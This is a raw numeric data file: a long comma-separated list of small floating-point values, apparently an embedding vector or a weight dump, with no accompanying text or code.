0.025721250101923943, 0.017024481669068336, 0.0027598596643656492, -0.012443436309695244, 0.04239272698760033, -0.00066489347955212, -0.015050861984491348, -0.01930297166109085, 0.0013989839935675263, -0.014048006385564804, -0.021838191896677017, -0.03558935225009918, -0.015692690387368202, -0.006711111869663, 0.0013348013162612915, 0.034498244524002075, 0.006045215763151646, -0.0384775772690773, 0.02920316532254219, -0.009908217005431652, -0.005788484588265419, 0.0008995617972686887, 0.0033996817655861378, 0.022624429315328598, -0.016703568398952484, 0.0382850281894207, 0.016414746642112732, -0.00873688142746687, -0.010148902423679829, 0.021838191896677017, 0.03966495767235756, -0.007862390950322151, -0.03343923017382622, 0.014986678957939148, -0.006987900007516146, -0.020297804847359657, 0.009683577343821526, 0.017168894410133362, 0.02592984400689602, -0.01432078331708908, -0.05089694634079933, 0.013630817644298077, -0.01713680289685726, 0.015443981625139713, 0.03164210915565491, -0.018051406368613243, 0.007168414071202278, -0.02137286588549614, 0.004825742915272713, -0.0011643157340586185, -0.03629536181688309, -0.002067888854071498, -0.030374500900506973, -0.009731713682413101, -0.02385994791984558, -0.00706411711871624, 0.026363076642155647, -0.048040810972452164, -0.02907479926943779, 0.01291678473353386, 0.04319501295685768, -0.02471037022769451, -0.002681636717170477, -0.03558935225009918, 0.006346072535961866, -0.005824587307870388, 0.0014812182635068893, 0.015098999254405499, 0.00855235569179058, 0.0057363361120224, -0.029122937470674515, 0.03960077464580536, -0.00011839967919513583, 0.016069764271378517, 0.00996437668800354, 0.012571802362799644, -0.01936715468764305, 0.0016105866525322199, -0.02665190026164055, -0.008600492961704731, 0.02065080963075161, -0.015692690387368202, 0.009988444857299328, -0.0056280274875462055, 0.03080773539841175, -0.0032793390564620495, 0.007738036569207907, 0.005459547974169254, 0.003289367537945509, 0.0067913406528532505, -0.01299701351672411, -0.04329128563404083, 0.0015875209355726838, -0.0134543152526021, 0.006065272726118565, 0.006622860673815012, 0.001790097914636135, 0.007894482463598251, 0.006293924059718847, 0.0134864067658782, 0.009739737026393414, -0.017152847722172737, 0.003973315469920635, -0.019607840105891228, -0.03369595855474472, -0.027117224410176277, 0.02225537970662117, 0.026523534208536148, -0.011496740393340588, -0.018468594178557396, 0.007673853542655706, 0.016671476885676384, -0.0005706250085495412, 0.014441126026213169, -0.019479474052786827, -0.018805554136633873, -0.017939087003469467, -0.013695000670850277, -0.004147812258452177, -0.018147680908441544, 0.025127558037638664, -0.0267802644520998, -0.0005016786744818091, -0.00288421381264925, 0.024854781106114388, 0.016703568398952484, 0.02995731309056282, -0.03944031894207001, -0.014545422978699207, 0.010357496328651905, 0.035942357033491135, -0.023266257718205452, -0.017297258600592613, -0.02838483452796936, -0.0057042445987463, -0.00708016287535429, 0.01615801453590393, 0.03262089937925339, 0.020281758159399033, 0.010413656011223793, 0.01196206547319889, -0.030374500900506973, -0.020602673292160034, -0.003140944754704833, 0.01907833106815815, -0.014064052142202854, 0.006241775583475828, 0.02357112616300583, -0.016703568398952484, -0.0026936710346490145, -0.012090431526303291, 0.0011342300567775965, 0.02920316532254219, -0.01668752357363701, -0.01707261987030506, 0.005222873762249947, 0.013831389136612415, 0.020506398752331734, -0.015419913455843925, -0.01414427999407053, 0.02533615194261074, 0.019158560782670975, -0.005058405455201864, -0.013863480649888515, -0.000024679657144588418, -0.0019385205814614892, -0.01898205652832985, 0.02461409568786621, -0.008002790622413158, -0.021067997440695763, 0.008127144537866116, -0.0036042642313987017, -0.017987223342061043, -0.029780810698866844, -0.028737839311361313, -0.02241583541035652, 0.020041072741150856, 0.03812457248568535, -0.020474307239055634, 0.02061871811747551, -0.027309773489832878, -0.014232531189918518, 0.021485185250639915, 0.021035905927419662, 0.018067453056573868, -0.02474246174097061, 0.004224029369652271, -0.01266807597130537, -0.005744358990341425, 0.011737425811588764, 0.022335607558488846, 0.01854882389307022, 0.0021782030817121267, -0.004216006491333246, -0.0023627285845577717, -0.007926573045551777, 0.0012966927606612444, -0.0028059908654540777, 0.0006919705774635077, -0.014417056925594807, -0.015756873413920403, 0.020827312022447586, -0.026010071858763695, -0.014762039296329021, 0.019190652295947075, 0.05169922858476639, 0.004548954777419567, -0.02146914042532444, -0.00530310207977891, -0.01713680289685726, 0.020217575132846832, 0.009442891925573349, -0.005258976481854916, 0.004901960026472807, -0.0022584316320717335, 0.018436504527926445, 0.005499661900103092, 0.06524179875850677, -0.0056119817309081554, -0.018564868718385696, -0.0030627220403403044, -0.014296714216470718, -0.03648791089653969, -0.0035140071995556355, -0.01060620415955782, -0.020329896360635757, -0.02087545022368431, -0.010758638381958008, -0.046917613595724106, -0.02668399177491665, -0.004049532115459442, 0.012339139357209206, -0.0025251912884414196, 0.0007721990696154535, -0.00005453029370983131, 0.017393533140420914, 0.022447926923632622, -0.016591249033808708, -0.0032693103421479464, 0.03169024735689163, -0.008768972009420395, 0.026988858357071877, 0.0009582288330420852, -0.008969543501734734, -0.009795896708965302, -0.010999323800206184, -0.003421744564548135, -0.024180863052606583, 0.023073710501194, -0.05214850977063179, 0.0115047637373209, 0.022624429315328598, -0.005062416661530733, -0.0008925417787395418, -0.0068755801767110825, -0.001457149744965136, -0.020698945969343185, -0.0009782860288396478, -0.00708016287535429, -0.01691216230392456, -0.00848817266523838, 0.011103620752692223, 0.09845638275146484, -0.015347707085311413, 0.01586919277906418, -0.01822790876030922, 0.0226886123418808, 0.008688744157552719, 0.0032833502627909184, 0.005932895932346582, -0.021388910710811615, 0.021067997440695763, 0.016992392018437386, -0.01417637150734663, 0.0021400945261120796, 0.019848525524139404, 0.009154069237411022, 0.0038529725279659033, -0.014729947783052921, -0.01816372759640217, 0.034498244524002075, -0.0005054394132457674, 0.00436041783541441, 0.0017389522399753332, 0.007549499627202749, -0.022143058478832245, 0.03308622166514397, -0.011536855250597, -0.004593080375343561, -0.028031829744577408, -0.043612200766801834, -0.018661143258213997, -0.010221107862889767, -0.013494429178535938, -0.006093352567404509, -0.004918005783110857, 0.005258976481854916, 0.01265203021466732, 0.01829209178686142, 0.0003725609858520329, -0.01555630099028349, -0.022656520828604698, 0.0004926529945805669, -0.004312280565500259, -0.022544201463460922, 0.005475593265146017, -0.0035661556757986546, -0.025641020387411118, 0.009699623100459576, -0.005796507466584444, -0.03254067152738571, 0.0016085809329524636, 0.007280734367668629, -0.0052429307252168655, 0.025031283497810364, -0.0017339378828182817, 0.008247487246990204, 0.03165815770626068, 0.00634206086397171, -0.003973315469920635, -0.004081623628735542, -0.030887963250279427, 0.006045215763151646, -0.0022504087537527084, -0.024822689592838287, 0.0014511325862258673, 0.004801674280315638, -0.006366129498928785, -0.015476073138415813, 0.023362532258033752, -0.02445363998413086, 0.001825197832658887, 0.01343826949596405, 0.0013568641152232885, -0.005551810376346111, -0.0025111513677984476, 0.0114084891974926, 0.021067997440695763, 0.019559701904654503, 0.03661627694964409, -0.01007669698446989, -0.013382109813392162, 0.04797662794589996, 0.042135994881391525, -0.0077260020188987255, 0.016494974493980408, 0.008921406231820583, 0.031417470425367355, -0.022078877314925194, -0.00528705632314086, -0.010959209874272346, -0.01612592302262783, -0.00847212690860033, 0.0033695960883051157, 0.013815343379974365, 0.007288757245987654, 0.01628638058900833, 0.021982602775096893, 0.020634764805436134, -0.0025973969604820013, -0.015107021667063236, -0.005696221720427275, 0.007124288473278284, -0.022431882098317146, 0.02668399177491665, 0.001996686216443777, -0.006522574927657843, -0.008155224844813347, -0.004809697158634663, 0.01619010604918003, 0.010710501112043858, -0.009571257047355175, -0.03149769827723503, -0.005026313941925764, 0.023057663813233376, -0.004476748872548342, -0.002438945695757866, 0.019672023132443428, 0.009707645513117313, -0.02596193552017212, -0.008147201500833035, -0.037546925246715546, -0.011937997303903103, -0.016374632716178894, 0.04104488715529442, -0.022014694288372993, 0.007746059447526932, -0.01671961508691311, -0.011015369556844234, -0.020394079387187958, 0.009009657427668571, 0.023747628554701805, 0.03244439512491226, 0.0038309097290039062, -0.0024108656216412783, -0.0031950990669429302, 0.018725326284766197, -0.011151758022606373, 0.02992522157728672, 0.00917813740670681, -0.010020536370575428, 0.0034137216862291098, 0.0002385543630225584, 0.0015574352582916617, 0.04033887758851051, -0.008793041110038757, -0.0021541346795856953, -0.02759859524667263, 0.004105692263692617, -0.01002855971455574, 0.011809631250798702, 0.013165492564439774, 0.010437725111842155, -0.045120496302843094, 0.026956768706440926, 0.031257014721632004, 0.0015263467794284225, 0.019816434010863304, 0.009033726528286934, -0.027390001341700554, 0.0031389391515403986, 0.0010810786625370383, 0.006795351859182119, -0.008945475332438946, 0.018917875364422798, -0.005130610894411802, -0.015957443043589592, 0.020987769588828087, 0.012363208457827568, -0.03690509870648384, -0.0000628665293334052, -0.012603893876075745, 0.011215941049158573, -0.009555211290717125, 0.0001919215574162081, 0.023587170988321304, 0.008335738442838192, 0.008512240834534168, -0.0024650199338793755, 0.022447926923632622, 0.02819228544831276, -0.03876639902591705, 0.004115720745176077, 0.005900804419070482, 0.007826288230717182, 0.011536855250597, 0.014641696587204933, -0.034337788820266724, -0.015098999254405499, 0.01675170660018921, -0.02615448273718357, 0.02625075727701187, 0.0025773397646844387, 0.039119403809309006, -0.011921951547265053, -0.0009542174520902336, 0.0016396695282310247, -0.02838483452796936, -0.000875994679518044, -0.016928208991885185, -0.01816372759640217, -0.0009100917959585786, -0.002061871811747551, -0.009250342845916748, -0.00187032634858042, 0.0043082693591713905, 0.0008975560776889324, -0.02464618720114231, -0.008074996061623096, -0.0043363492004573345, 0.00141803827136755, -0.012250888161361217, -0.018083497881889343, -0.00021047439076937735, 0.002705705352127552, -0.008945475332438946, 0.0007225577137432992, 0.009442891925573349, 0.007894482463598251, -0.03722601383924484, -0.0068274433724582195, 0.007565545383840799, -0.0035360699985176325, -0.0001919215574162081, 0.0035741785541176796, 0.011304192245006561, 0.002372757066041231, 0.020041072741150856, 0.028673656284809113, -0.04402938857674599, 0.005403387825936079, 0.028400881215929985, -0.023587170988321304, -0.015780940651893616, -0.018468594178557396, 0.011280124075710773, -0.01766631007194519, -0.02320207469165325, 0.02061871811747551, 0.007208528462797403, -0.0020578603725880384, 0.0005911836051382124, 0.010678410530090332, -0.02363530918955803, -0.02118031680583954, -0.008327716030180454, 0.008058950304985046, -0.0001658473047427833, -0.006502517964690924, -0.0028260480612516403, -0.006269855424761772, 0.045056313276290894, -0.013045149855315685, 0.01120791770517826, 0.004440646152943373, -0.012619939632713795, -0.005387342069298029, 0.01989666186273098, 0.010156924836337566, -0.008592469617724419, 0.0012555756838992238, 0.0011272100964561105, 0.006197649519890547, -0.02445363998413086, -0.0038970981258898973, 0.011761494912207127, -0.03177047520875931, 0.027646733447909355, -0.02045826055109501, -0.016575202345848083, 0.0060572498477995396, -0.011063506826758385, 0.022046785801649094, -0.004797663073986769, 0.0017700407188385725, -0.02586566098034382, -0.006346072535961866, 0.01691216230392456, 0.010437725111842155, -0.010485861450433731, 0.00354810431599617, -0.008993611671030521, -0.011368375271558762, 0.07470875978469849, 0.00496614258736372, -0.01502679381519556, 0.021613551303744316, -0.035910267382860184, -0.014497285708785057, -0.009659508243203163, -0.0038489610888063908, -0.007124288473278284, -0.016117900609970093, 0.0017349408008158207, -0.009515097364783287, -0.013743137940764427, 0.018051406368613243, 0.003297390416264534, -0.026844447478652, 0.006911683361977339, -0.013173515908420086, 0.010726546868681908, 0.00030336392228491604, 0.032364167273044586, 0.03162606433033943, -0.0001098754073609598, -0.008969543501734734, 0.018308138474822044, -0.013301881030201912, -0.011568945832550526, 0.008873268961906433, -0.012451459653675556, 0.00985205639153719, -0.010558067820966244, -0.013261767104268074, -0.01268412172794342, 0.0029323508497327566, -0.014513331465423107, 0.011103620752692223, 0.001604569493792951, -0.011817654594779015, 0.0027698881458491087, 0.0025673112832009792, -0.0034137216862291098, -0.06623663008213043, -0.018372321501374245, -0.003303407458588481, 0.018404413014650345, 0.004962131381034851, -0.0012365214060992002, -0.006502517964690924, -0.01368697825819254, 0.0226886123418808, -0.0038349211681634188, 0.034305695444345474, 0.0023928142618387938, 0.006201661191880703, -0.011352329514920712, 0.013341995887458324, -0.001389958313666284, -0.012579824775457382, 0.012002180330455303, -0.034690793603658676, 0.016133947297930717, -0.011119666509330273, 0.019383199512958527, 0.015460027381777763, 0.012619939632713795, 0.004029475152492523, 0.008187316358089447, 0.002416882896795869, -0.02320207469165325, -0.00040741023258306086, -0.011552900075912476, 0.0023326429072767496, 0.028497153893113136, 0.010405633598566055, -0.006939763203263283, -0.005182759370654821, 0.007665830664336681, 0.02392413094639778, -0.015211318619549274, -0.014906451106071472, 0.018003270030021667, 0.0033836360089480877, 0.00034072031849063933, 0.010999323800206184, -0.006522574927657843, -0.005086485296487808, 0.003287361701950431, 0.023394623771309853, -0.01678379625082016, -0.008712812326848507, 0.010381564497947693, -0.0019264862639829516, 0.007569556590169668, 0.005756393074989319, -0.01612592302262783, 0.021549368277192116, -0.0052148508839309216, -0.018629051744937897, 0.025480564683675766, -0.008768972009420395, -0.019415291026234627, -0.007264688611030579, -0.002188231563195586, -0.026828402653336525, 0.0021681746002286673, -0.0055197193287312984, -0.0005460550892166793, 0.005680175963789225, -0.020281758159399033, -0.00016058230539783835, 0.00232261442579329, 0.02055453509092331, 0.03058309480547905, 0.009571257047355175, 0.009844033978879452, -0.013293858617544174, 0.009154069237411022, -0.027614641934633255, -0.001847260631620884, 0.009659508243203163, -0.0008534304215572774, 0.007974710315465927, 0.016374632716178894, 0.011007347144186497, 0.024020405486226082, 0.007044060155749321, 0.004252109210938215, 0.03562144190073013, -0.024726416915655136, 0.01409614272415638, -0.0017921035178005695, -0.013590703718364239, -0.016053717583417892, -0.03048682026565075, 0.014088120311498642, -0.0035962413530796766, 0.00999646820127964, -0.004761559888720512, -0.0033916588872671127, 0.013293858617544174, -0.017987223342061043, -0.03234812244772911, -0.04762362316250801, -0.004179903771728277, 0.00022250866459216923, 0.00986810214817524, -0.015219341963529587, -0.007637750823050737, -0.02077917568385601, -0.005760404746979475, -0.0007290762732736766, 0.016607293859124184, -0.00649048388004303, 0.007894482463598251, 0.0060211471281945705, -0.023089755326509476, -0.011681266129016876, -0.006602803710848093, -0.007320848293602467, 0.01757003553211689, -0.01194601971656084, -0.019351107999682426, 0.0029303450137376785, -0.0228490699082613, -0.021581459790468216, -0.011801608838140965, -0.0077260020188987255, -0.013141424395143986, -0.00026249754591844976, 0.01563652977347374, 0.0004447665996849537, -0.00036253241705708206, 0.025544745847582817, -0.004053543787449598, -0.02052244357764721, 0.006017135456204414, -0.001366892596706748, 0.004641217179596424, 0.013767206110060215, 0.013430247083306313, -0.027309773489832878, 0.02058662660419941, 0.0036162985488772392, 0.015540256164968014, 0.003696527099236846, 0.00020771654089912772, 0.0014521353878080845, -0.006366129498928785, -0.01747376285493374, 0.008415967226028442, 0.00015293553587980568, 0.005848655942827463, 0.0032051275484263897, -0.008327716030180454, -0.006125444080680609, -0.011015369556844234, -0.0113763976842165, -0.002026771893724799, -0.004416577517986298, -0.0047214459627866745, 0.012812487781047821, -0.001057010143995285, 0.002673613838851452, -0.0017088665626943111, 0.00246702553704381, -0.003265298902988434, -0.0023466828279197216, 0.01291678473353386, 0.023442760109901428, 0.00007051330612739548, 0.015821054577827454, -0.0029604306910187006, -0.005479604937136173, 0.030727505683898926, 0.02222328819334507, 0.012090431526303291, 0.024277137592434883, 0.00845608115196228, -0.023843903094530106, 0.011183849535882473, -0.015853146091103554, 0.01619812846183777, 0.001019904506392777, -0.005154679529368877, -0.0007987747667357326, -0.00501427985727787, 0.009691599756479263, 0.013935686089098454, -0.014184394851326942, -0.0025171684101223946, -0.01753794401884079, -0.01570071280002594, -0.004416577517986298, -0.008087030611932278, 0.007485316600650549, 0.003245241940021515, -0.022576292976737022, -0.022736750543117523, -0.009346617385745049, 0.014938542619347572, 0.018083497881889343, 0.001219472847878933, -0.020233621820807457, 0.003929189406335354, 0.021822145208716393, 0.03497961536049843, 0.002210294594988227, 0.0015845124144107103, -0.00844003539532423, 0.008006801828742027, 0.005038348492234945, -0.012956898659467697, 0.003678475506603718, 0.009418822824954987, -0.007208528462797403, 0.01936715468764305, -0.018308138474822044, -0.0009973401902243495, -0.007032026071101427, 0.011215941049158573, -0.010309359058737755, -0.00030837819213047624, 0.024100633338093758, -0.0038529725279659033, -0.003407704411074519, -0.014072074554860592, 0.002573328325524926, -0.007052083034068346, 0.01700843684375286, 0.012098453938961029, 0.0007305805338546634, -0.008375853300094604, -0.01901414804160595, 0.0017339378828182817, 0.007581591140478849, -0.0016166038112714887, 0.00009802916611079127, 0.013598727062344551, 0.006650940515100956, 0.002047831891104579, -0.015877215191721916, 0.024405501782894135, -0.00027152325492352247, 0.018629051744937897, 0.009314525872468948, -0.0017529921606183052, 0.001900412025861442, 0.00013237698294688016, -0.016703568398952484, 0.0017860864754766226, 0.012451459653675556, -0.0022564257960766554, -0.004709411412477493, -0.0007867405074648559, 0.0021862259600311518, 0.013775229454040527, -0.01901414804160595, -0.0073128254152834415, 0.012611916288733482, 0.01898205652832985, 0.004095663782209158, -0.034626610577106476, -0.020955678075551987, -0.012884693220257759, -0.011087574996054173, 0.01776258461177349, 0.00748130539432168, -0.02058662660419941, -0.005391353741288185, 0.005431467667222023, 0.02920316532254219, -0.032925765961408615, -0.002188231563195586, -0.016430791467428207, -0.014088120311498642, -0.018725326284766197, -0.014064052142202854, 0.0031389391515403986, 0.013767206110060215, -0.009555211290717125, 0.020169438794255257, -0.009844033978879452, -0.0051346225664019585, -0.011729403398931026, -0.011248032562434673, 0.04021051153540611, 0.006707100663334131, -0.0077059450559318066, -0.013149446807801723, 0.005295079201459885, -0.0009191174758598208, -0.0024048485793173313, -0.00932254921644926, 0.004512851592153311, -0.006354095414280891, 0.012563779018819332, -0.0036062700673937798, -0.006542632356286049, -0.0385417602956295, 0.006735180504620075, -0.005291067995131016, -0.0007386034121736884, 0.004183914978057146, 0.0020959689281880856, 0.005006256978958845, 0.0056721530854702, -0.031577929854393005, 0.014473216608166695, -0.0014431097079068422, 0.00988414790481329, 0.0009802916320040822, 0.01769840158522129, 0.018067453056573868, -0.0043443720787763596, 0.039279863238334656, -0.0017239094013348222, -0.004833765793591738, 0.014352873899042606, 0.009940308518707752, -0.012547733262181282, 0.0017269179224967957, -0.015187250450253487, 0.000687959196511656, -0.023250212892889977, 0.007665830664336681, 0.01270016748458147, -0.0009672545711509883, -0.009771828539669514, 0.019190652295947075, -0.0011091586202383041, 0.009250342845916748, -0.0029704594053328037, 0.012531687505543232, 0.015772918239235878, -0.013237698934972286, 0.0015213324222713709, 0.0036243214271962643, 0.013558612205088139, -0.0006307963631115854, 0.019479474052786827, 0.009771828539669514, -0.0015584381762892008, 0.005395364947617054, 0.0036824869457632303, 0.0024429571349173784, 0.0014471211470663548, 0.01864509843289852, 0.010197039693593979, -0.0017038522055372596, -0.007092197425663471, 0.0010901044588536024, -0.011801608838140965, 0.006550655234605074, -0.01939924620091915, -0.0015885238535702229, 0.01826000027358532, -0.000532516511157155, -0.004408554639667273, 0.0016697552055120468, 0.00743316812440753, -0.007477293722331524, 0.00043298304080963135, -0.00495009683072567, -0.005046370904892683, -0.037643201649188995, -0.005455536302179098, -0.011215941049158573, 0.003193093230947852, 0.009386731311678886, 0.005908827297389507, -0.012379254214465618, 0.009763805195689201, 0.006466415245085955, 0.004873879719525576, -0.022175149992108345, -0.004464714787900448, 0.002629488240927458, -0.0011272100964561105, 0.008111098781228065, 0.026555625721812248, -0.0015173210995271802, 0.007826288230717182, 0.021838191896677017, -0.0006197649636305869, 0.014593559317290783, 0.0016306437319144607, 0.004380474798381329, 0.004653251729905605, 0.004532909020781517, 0.029716627672314644, -0.010453769937157631, -0.002505134092643857, -0.009282434359192848, -0.021019861102104187, 0.012531687505543232, 0.0028280536644160748, -0.008793041110038757, 0.004918005783110857, 0.005451525095850229, -0.015909306704998016, 0.006907671689987183, 0.019639931619167328, -0.00337160169146955, 0.0009632431319914758, 0.00870478991419077, -0.01059015840291977, -0.016928208991885185, -0.017746537923812866, -0.010493884794414043, 0.009426846168935299, 0.023394623771309853, 0.01939924620091915, -0.014232531189918518, -0.000016578462236793712, -0.00780221913009882, 0.005700233392417431, -0.015179228037595749, -0.014344851486384869, -0.00358019582927227, 0.03831712156534195, 0.00034072031849063933, -0.007778150495141745, 0.010991301387548447, -0.016799842938780785, 0.024437593296170235, -0.031449563801288605, 0.026234712451696396, -0.027165362611413002, 0.027277681976556778, -0.012138568796217442, 0.010285290889441967, -0.01861300691962242, 0.008865246549248695, 0.005010268185287714, 0.001396978390403092, -0.00353205855935812, 0.005431467667222023, -0.007168414071202278, -0.021870281547307968, -0.0025011226534843445, 0.020506398752331734, 0.00612143287435174, 0.021822145208716393, 0.0032713161781430244, -0.002454991452395916, -0.001935511943884194, -0.011617083102464676, -0.0038589895702898502, -0.009370685555040836, -0.015098999254405499, -0.007344916928559542, 0.03963286802172661, -0.003969303797930479, -0.014729947783052921, -0.015427935868501663, 0.017217030748724937, -0.00610538711771369, 0.00855235569179058, -0.010758638381958008, 0.007429156918078661, -0.0014090125914663076, -0.0016176066128537059, 0.0027979679871350527, 0.031096557155251503, -0.007044060155749321, 0.00008449060987913981, 0.011328260414302349, 0.0052429307252168655, -0.011865791864693165, 0.0006087335641495883, -0.0067913406528532505, -0.016992392018437386, 0.003608275670558214, 0.005780461709946394, -0.0036824869457632303, -0.03244439512491226, 0.005182759370654821, -0.003000545082613826, -0.024341318756341934, -0.0056360503658652306, -0.022800933569669724, 0.0027959623839706182, 0.008825132623314857, 0.008319692686200142, 0.01576489582657814, -0.004115720745176077, 0.014842268079519272, 0.006566700525581837, 0.0036604241468012333, -0.015484095551073551, 0.003052693558856845, -0.03680882602930069, 0.011649174615740776, 0.0008469118620269, -0.005266999360173941, -0.001426061149686575, 0.0055558220483362675, 0.024084588512778282, -0.01776258461177349, 0.01224286574870348, -0.00933859497308731, -0.006450369488447905, -0.008263533003628254, -0.01558839250355959, -0.013061195611953735, 0.00040816236287355423, -0.006001090165227652, -0.007978721521794796, -0.013566635549068451, 0.008760949596762657, -0.008560378104448318, 0.00034021888859570026, -0.010838867165148258, -0.018308138474822044, -0.006466415245085955, 0.005323159508407116, -0.015524210408329964, -0.014745993539690971, 0.036199089139699936, -0.0033896530512720346, -0.012796442024409771, 0.005916850175708532, -0.008010813035070896, 0.005928884260356426, -0.017810720950365067, 0.03114469349384308, -0.007830299437046051, -0.010935140773653984, -0.009771828539669514, 0.009458937682211399, 0.006109398324042559, -0.011175827123224735, 0.0036624299827963114, 0.027951600030064583, 0.014184394851326942, -0.0012405328452587128, -0.029652444645762444, -0.01073457021266222, -0.009739737026393414, 0.008359807543456554, 0.014986678957939148, 0.0012846584431827068, -0.03353550285100937, -0.012892715632915497, -0.006851512007415295, -0.01502679381519556, -0.0022363688331097364, -0.016575202345848083, 0.005964986979961395, -0.0018913863459601998, -0.016607293859124184, 0.009811942465603352, 0.014200440607964993, -0.0022123001981526613, 0.00007778401777613908, -0.01927088014781475, -0.0034618587233126163, -0.026459351181983948, 0.015877215191721916, 0.006771283224225044, 0.008544332347810268, -0.009410800412297249, -0.0068555232137441635, 0.011240009218454361, -0.009539165534079075, 0.00985205639153719, 0.00743316812440753, -0.013807320967316628, -0.011528831906616688, -0.01221077423542738, 0.00635810662060976, -0.010445747524499893, 0.03639163821935654, 0.026844447478652, 0.0076618194580078125, 0.00925836618989706, 0.0011262071784585714, 0.010469815693795681, 0.003243236104026437, 0.014697857201099396, -0.011079552583396435, 0.00267561967484653, 0.011745449155569077, 0.003921166528016329, 0.025657067075371742, -0.008119122125208378, 0.0002945889427792281, -0.0047776056453585625, 0.01340617798268795, 0.004589068703353405, -0.00538333086296916, -0.0006202664226293564, 0.014625650830566883, 0.020538490265607834, -0.005066428333520889, -0.020923586562275887, -0.008921406231820583, -0.007164402864873409, 0.013117356225848198, 0.02970058098435402, -0.0001770040689734742, -0.0032251847442239523, 0.005712267477065325, -0.002669602632522583, -0.01293283049017191, 0.007453225553035736, -0.006113409996032715, -0.018933920189738274, -0.013069218955934048, 0.003303407458588481, 0.0024128714576363564, 0.01750585250556469, 0.01989666186273098, -0.030695414170622826, 0.004633194301277399, -0.003030630759894848, -0.0003963788039982319, -0.014970633201301098, -0.008905360475182533, -0.008319692686200142, -0.00752944266423583, 0.01707261987030506, -0.034626610577106476, -0.017682356759905815, -0.014874359592795372, 0.006189627107232809, 0.006177592556923628, -0.004544943105429411, 0.0023246200289577246, 0.020987769588828087, 0.006261832546442747, -0.017313305288553238, -0.005307113751769066, -0.03501170501112938, -0.006967843044549227, -0.006093352567404509, 0.010317382402718067, 0.025288015604019165, -0.028497153893113136, -0.02121240831911564, -0.013446292839944363, 0.008058950304985046, 0.0008423990220762789, -0.02146914042532444, -0.007328871171921492, -0.02756650373339653, -0.0228490699082613, -0.010758638381958008, 0.002438945695757866, -0.009587302803993225, 0.0002612439857330173, -0.0004364930500742048, -0.009691599756479263, -0.011079552583396435, -0.011248032562434673, -0.0022203230764716864, -0.017810720950365067, 0.002158145885914564, 0.0004159345116931945, -0.022143058478832245, -0.005495650693774223, -0.035910267382860184, -0.003489938797429204, 0.0005641064490191638, -0.027325818315148354, -0.002268460113555193, 0.00845608115196228, 0.028015783056616783, -0.009699623100459576, -0.00919418316334486, -0.014264622703194618, 0.027165362611413002, -0.009547188878059387, 0.015171204693615437, 0.013430247083306313, -0.00675924913957715, -0.005078462418168783, -0.0010860930196940899, -0.011079552583396435, -0.009298480115830898, -0.010533998720347881, -0.012050316669046879, 0.000497165834531188, -0.003941223956644535, -0.0036243214271962643, 0.0017770606791600585, 0.04107698053121567, 0.009844033978879452, -0.003401687368750572, -0.0031449561938643456, 0.011480694636702538, -0.012363208457827568, -0.010943164117634296, 0.01004460547119379, -0.008480150252580643, -0.006394209340214729, 0.01274830475449562, -0.011304192245006561, -0.013815343379974365, 0.018725326284766197, -0.004452680237591267, 0.010421679355204105, -0.022768842056393623, -0.01845254935324192, -0.01867718994617462, -0.016896117478609085, -0.019880617037415504, 0.011761494912207127, 0.006173581350594759, 0.019158560782670975, 0.0029844993259757757, -0.00427617784589529, -0.00996437668800354, 0.009314525872468948, 0.011223963461816311, 0.007649785373359919, 0.023057663813233376, -0.011601037345826626, 0.017152847722172737, 0.0064343237318098545, -0.018179772421717644, -0.01858091540634632, 0.012515641748905182, -0.005928884260356426, -0.00704807136207819, 0.00783431064337492, 0.009354639798402786, 0.004725457169115543, 0.008544332347810268, -0.0033074188977479935, 0.015395844355225563, -0.009009657427668571, -0.0230416189879179, -0.0011883842526003718, 0.00022062830976210535, 0.018837645649909973, 0.015066907741129398, -0.0012766355648636818, -0.01224286574870348, 0.011063506826758385, -0.018725326284766197, 0.0030627220403403044, -0.009450914338231087, 0.022528156638145447, -0.008809086866676807, -0.015596415847539902, -0.01424055453389883, -0.023715537041425705, 0.03995377942919731, 0.011448603123426437, 0.0007381019531749189, -0.01563652977347374, 0.005912838503718376, 0.0016988379647955298, -0.01060620415955782, -0.008712812326848507, -0.0072686998173594475, 0.03117678500711918, -0.010919095948338509, -0.007886459119617939, -0.004829754121601582, 0.021854236721992493, 0.008239464834332466, 0.00568819884210825, 0.000017173908418044448, 0.0021320716477930546, -0.0063621182925999165, 0.029427804052829742, 0.036006540060043335, -0.010485861450433731, 0.031064465641975403, 0.017971178516745567, -0.028593428432941437, -0.0016456865705549717, -0.01920669712126255, 0.006915694568306208, 0.03680882602930069, -0.002422899939119816, -0.005728313233703375, -0.007409099955111742, -0.013654886744916439, 0.01197811122983694, 0.008263533003628254, -0.0135184982791543, 0.0012234842870384455, -0.02228747121989727, 0.007252654060721397, 0.012539710849523544, -0.004484771750867367, 0.011328260414302349, -0.017200985923409462, -0.006245786789804697, -0.004573022946715355, 0.0009893174283206463, -0.005632039159536362, -0.006265843752771616, -0.006915694568306208, 0.01420846302062273, -0.015644552186131477, -0.0009336589137092233, -0.023073710501194, 0.021693779155611992, 0.004536920227110386, -0.01785885915160179, -0.004817720036953688, -0.014577514491975307, -0.012611916288733482, 0.030567049980163574, -0.02068290114402771, 0.011737425811588764, -0.007489328272640705, 0.001272624242119491, 0.01867718994617462, 0.005391353741288185, -0.0006528592202812433, 0.0012595871230587363, -0.019094377756118774, -0.00396529259160161, -0.000011908914530067705, -0.013085264712572098, -0.031257014721632004, 0.028368789702653885, -0.010124833323061466, -0.00998042244464159, 0.007854367606341839, -0.01625428907573223, -0.026427259668707848, 0.005936907138675451, -0.0068475003354251385, -0.04236063361167908, 0.010566090233623981, -0.0006553663406521082, -0.003319453215226531, 0.004938062746077776, 0.010550044476985931, -0.024116680026054382, -0.008728858083486557, 0.01298096776008606, -0.000724061974324286, 0.0048056854866445065, 0.007565545383840799, -0.004143800586462021, 0.02241583541035652, 0.008231441490352154, -0.00048112013610079885, 0.006330026779323816, 0.03194697946310043, -0.008143190294504166, -0.00002182778735004831, -0.006586757954210043, -0.0030065621249377728, -0.014826222322881222, 0.034498244524002075, 0.01688007079064846, 0.003608275670558214, -0.006225729826837778, 0.0011944014113396406, -0.01350245252251625, -0.010020536370575428, 0.0015143124619498849, -0.006334037985652685, 0.01616603694856167, 0.0000993454159470275, 0.007962675765156746, -0.011480694636702538, 0.006959820166230202, -0.014433102682232857, 0.013301881030201912, 0.015756873413920403, -0.01704052835702896, 0.0036704528611153364, -0.00870478991419077, 0.013398155570030212, -0.00007797205034876242, -0.029379667714238167, 0.005086485296487808, -0.01668752357363701, 0.02398831397294998, 0.004593080375343561, 0.003929189406335354, -0.016398699954152107, 0.006590769160538912, -0.01589326187968254, -0.018340229988098145, 0.012852601706981659, -0.006486472208052874, -0.000513963692355901, -0.0055197193287312984, 0.010975255630910397, 0.0034758986439555883, 0.01999293640255928, 